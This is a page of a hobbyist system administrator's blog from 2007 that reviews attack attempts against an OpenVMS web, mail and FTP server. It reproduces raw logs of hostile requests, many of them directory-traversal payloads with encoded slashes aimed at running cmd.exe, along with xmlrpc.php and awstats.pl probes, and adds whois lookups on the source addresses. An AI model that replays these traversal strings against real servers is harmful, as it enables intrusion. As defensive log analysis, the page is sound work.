Security – Page 13 – SYSMGR in the attic

20-Feb-2007

One more day of (mail) bombing

On yesterday’s post, I mentioned some server trying to deliver something – blocked because the address cannot be translated to a domain – one verey wto minutes or so.
Well, it did continue until this – being the last post:

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%% Message from user INTERnet on DIANA INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%% Message from user TCPIP$SMTP on DIANA %TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

Operator.log is over 4 times the usual size. I guess 4 times, since Persepone – the personal Alpha on Demeter – was added to the cluster yesterday – over Wireless – what Alpha could do that! – and that added some extra lines as well.

19-Feb-20074-Mar-2008

Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a windows system, this is what I found in last week’s webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815 222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782 222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..Ã€/..Ã€/..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809 222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..Ã€/../..Ã€/../..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815 222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..Ã€Â¯..Ã€Â¯..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809 222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..Ã€Â¯../..Ã€Â¯../..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815 222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..Ã€/..Ã€/..Ã€/..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815 222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803 222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..Ã€Â¯..Ã€Â¯..Ã€Â¯..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815 222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803 222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811 222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787 222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802 222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776 222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776 222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802 222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811 222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787 222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802 222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776 222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776 222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802 222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781 222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675 222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783 222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774 222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774 222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800 222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801 222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..Ã€/..Ã€/..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812 222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..Ã€Â¯..Ã€Â¯..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812 222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809 222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777 222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803 222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..Ã€/..Ã€/..Ã€/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812 222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..Ã€Â¯..Ã€Â¯..Ã€Â¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812 222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671 222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809 222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777 222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803 222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812 222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780 222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806 222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675 222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
Clearly someone who’s running a script, and I severely doubt his knowlegde…..Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255 netname: CHINANET-JS descr: CHINANET jiangsu province network descr: China Telecom descr: A12,Xin-Jie-Kou-Wai Street descr: Beijing 100088 country: CN admin-c: CH93-AP tech-c: CJ186-AP mnt-by: APNIC-HM mnt-lower: MAINT-CHINANET-JS mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 – – [12/Feb/2007:07:02:35 +0100] “GET /No%0Ate-email.htm HTTP/1.1” 403 864
69.84.207.37 – – [12/Feb/2007:07:06:27 +0100] “GET /cgi-bin/count.exe HTTP/1.1” 502 900
69.84.207.37 – – [12/Feb/2007:07:06:28 +0100] “GET /cgi-bin/c%0Aount.exe HTTP/1.1” 404 887
207.234.131.90 – – [12/Feb/2007:09:56:37 +0100] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 893

These are just a few of these, not a lot in a week.
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%% Message from user INTERnet on DIANA INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977


%%%%%%%%%%%  OPCOM  18-FEB-2007 14:46:13.92  %%%%%%%%%%%

Message from user TCPIP$SMTP on DIANA

%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable

...

%%%%%%%%%%%  OPCOM  19-FEB-2007 22:50:57.98  %%%%%%%%%%%

Message from user INTERnet on DIANA

INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%% Message from user TCPIP$SMTP on DIANA %TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

I haven’t count the entries, but the attempts occur each 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255 netname: UK-WH-UK-20040830 descr: World Hub Limited descr: PROVIDER Local Registry country: GB # US org: ORG-WHL1-RIPE admin-c: DA1277-RIPE tech-c: DA1277-RIPE status: ALLOCATED PA mnt-by: RIPE-NCC-HM-MNT mnt-lower: worldhub-ip mnt-routes: worldhub-ip source: RIPE # Filtered

Both ISP’s will be informed.

14-Feb-2007

Some keep trying

Just one tried to get into the anonymous area yesterday – this is what OPERATOR.LOG tells:
%%%%%%%%%%% OPCOM 13-FEB-2007 04:15:37.63 %%%%%%%%%%% Message from user TCPIP$FTP on DIANA User Name: anonymous Source: p548C9062.dip0.t-ipconnect.de Status: NOPRIV -- File access violation Object: WEB_DISK2:[public.anonymous.070213041515p]

It has been a long time since I saw these messages. Checking the looging of anonymous FTP, there have been some atempts but it’s all very, very quiet here. However, for some reason the logfiles do not show up in the operator desk, so that’s something to look into.
The oldest – after the link from the main page has been removed – goes back to 13-Nov-2006, and once in a while, once or wtice a month, someone comes along to try to host some files. But the area is set to be read_only so that is bound to fail. Since most don’t have a clue what they’re doing, they try to access “standard” files. That is: standrad for Linix or Windows, or some packages.
13-FEB-2007 04:15:36.20 User:anonymous logged in ident:Agpuser@home.com from Host:p548C9062.dip0.t-ipconnect.de 13-FEB-2007 04:15:37.54 User:anonymous ident:Agpuser@home.com status:00010001 CWD dir:WEB_DISK2:[public.anonymous] 13-FEB-2007 04:15:39.24 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]tagged 13-FEB-2007 04:15:39.32 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Tagged 13-FEB-2007 04:15:39.40 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]TaGGeD 13-FEB-2007 04:15:39.48 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]data 13-FEB-2007 04:15:39.57 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Data 13-FEB-2007 04:15:39.65 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]^% 13-FEB-2007 04:15:39.74 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$SCRATCH^: 13-FEB-2007 04:15:39.82 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]T^^^@gged 13-FEB-2007 04:15:39.90 User:anonymous ident:Agpuser@home.com logged out
The same is observered on web access, at some times. The latest proof from last week’s log:
219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 302 360 219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /cmd.php HTTP/1.1" 302 360 219.122.14.36 - - [07/Feb/2007:19:16:29 +0100] "GET /cacti/cmd.php HTTP/1.1" 302 360 219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cacti/cmd.php HTTP/1.1" 302 360 219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cmd.php HTTP/1.1" 302 360 219.122.14.36 - - [07/Feb/2007:19:16:31 +0100] "GET /stats/cmd.php HTTP/1.1" 302 360
but some will drop their attempt directly:
213.247.43.35 - - [11/Feb/2007:07:25:24 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

23-Jan-200723-Jan-2007

A few try it (again) over the web

In last webserver log, there were two similar attempts:
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 864
Checking this address, it seems to originate from France:
inetnum: 213.186.50.128 - 213.186.50.191 netname: BEWEST descr: BEWEST country: FR admin-c: OK217-RIPE tech-c: OK217-RIPE status: ASSIGNED PA mnt-by: OVH-MNT source: RIPE # Filtered


...

% Information related to '213.186.32.0/19AS16276'

route: 213.186.32.0/19 descr: OVH ISP descr: Paris, France origin: AS16276 mnt-by: OVH-MNT source: RIPE # Filtered
A few days later, there has been another one:
211.174.62.251 - - [18/Jan/2007:12:51:14 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:15 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:15 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:16 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:17 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:17 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:18 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:18 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:19 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:20 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:20 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:21 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:22 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:22 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:23 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:23 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:24 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:25 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:25 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:26 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:27 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:27 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:28 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:28 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:29 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:30 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868 211.174.62.251 - - [18/Jan/2007:12:51:30 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868
Whois tells it seems to be Korean, guess it’s spoofed because there is no WHOIS information at all.
The Forums
have some issues as well. Some people seem to like to add their name, fake IP address and whatever on the site – where it clearly states its for Dutch VMS users (in Dutch, so what would someone from the US, or Russia, expect). I had to check the code, because the username that pops up when his credentials are accessed, is overwritten by the administartor name. So I decided to remove ALL questionable users and change the administrator password.
Webmail
running on VMS is great: Guess a mail with subject “Passionate Kiss” holding an attachement “Greeting Card.exe” – mind the extension… That is simply shown in the button, so I’m warned on beforehand.
Login failures
have been located on 21-Jan-2007 – but all on DECNet – and I guess that has to do with the boots last weekend – given the time (around 19:30) quite feasable. And: these can only come from the local network. So I dont mind them – and 22-jan-2007 is all clear:
================================================================================ 23-JAN-2007 00:01:01.96 Login failures found No login failures found

15-Jan-200715-Jan-2007

Script kiddy

It’s been some time, but today there has been a script kiddy busy:
213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:49 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 864 213.186.50.160 - - [15/Jan/2007:17:59:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 864
Who is this:
$ whois 213.186.50.160


Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered

with many different competing registrars. Go to http://www.internic.net

for detailed information.
   Server Name: NS1.HEBERGISTE.COM

   IP Address: 213.186.50.160

   Registrar: OVH

   Whois Server: whois.ovh.com

   Referral URL: http://www.ovh.com

>>> Last update of whois database: Mon, 15 Jan 2007 07:54:15 EST < << $ whois ovh.com Whois Server Version 1.3 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: OVH.COM Registrar: OVH Whois Server: whois.ovh.com Referral URL: http://www.ovh.com Name Server: NS.OVH.NET Name Server: DNS.OVH.NET Status: clientTransferProhibited Status: clientUpdateProhibited Status: clientDeleteProhibited Updated Date: 09-feb-2006 Creation Date: 07-feb-1997 Expiration Date: 08-feb-2007 >>> Last update of whois database: Mon, 15 Jan 2007 07:54:15 EST < <<

That's just what VMS's services gave. A web-based service gave this:

inetnum: 213.186.50.128 - 213.186.50.191 netname: BEWEST descr: BEWEST country: FR admin-c: OK217-RIPE tech-c: OK217-RIPE status: ASSIGNED PA mnt-by: OVH-MNT source: RIPE # Filtered

May 2024
M	T	W	T	F	S	S
« Nov
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31